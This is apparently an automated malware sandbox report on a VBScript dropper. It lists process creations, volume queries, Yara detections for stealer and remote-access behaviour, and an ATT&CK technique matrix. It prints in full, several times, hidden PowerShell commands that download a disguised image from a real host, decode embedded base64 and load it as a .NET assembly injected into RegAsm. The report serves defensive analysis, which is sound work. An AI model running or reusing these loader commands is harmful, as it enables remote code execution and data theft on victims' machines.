            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremqdgtrevdgtredudgtrendgtredgtreydgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtremwdgtre5dgtredqdgtreodgtredgtreydgtreddgtredgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtre
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'c:\programdata\' , 'name_file','regasm',''))} }"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremqdgtrevdgtredudgtrendgtredgtreydgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtremwdgtre5dgtredqdgtreodgtredgtreydgtreddgtredgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtreJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'c:\programdata\' , 'name_file','regasm',''))} }"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: RegAsm.exe, 00000007.00000002.3573731475.00000000065F2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.3573731475.00000000065B0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.3512863153.0000000001132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3504238257.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3520703529.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3504238257.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3520703529.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting
            Valid Accounts1
            Windows Management Instrumentation
            221
            Scripting
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            OS Credential Dumping1
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution
            1
            DLL Side-Loading
            311
            Process Injection
            2
            Obfuscated Files or Information
            LSASS Memory13
            System Information Discovery
            Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts11
            Command and Scripting Interpreter
            11
            Registry Run Keys / Startup Folder
            11
            Registry Run Keys / Startup Folder
            1
            Software Packing
            Security Account Manager21
            Security Software Discovery
            SMB/Windows Admin SharesData from Network Shared Drive11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts3
            PowerShell
            Login HookLogin Hook1
            DLL Side-Loading
            NTDS1
            Process Discovery
            Distributed Component Object ModelInput Capture1
            Non-Standard Port
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets31
            Virtualization/Sandbox Evasion
            SSHKeylogging2
            Non-Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input Capture213
            Application Layer Protocol
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
            Process Injection
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
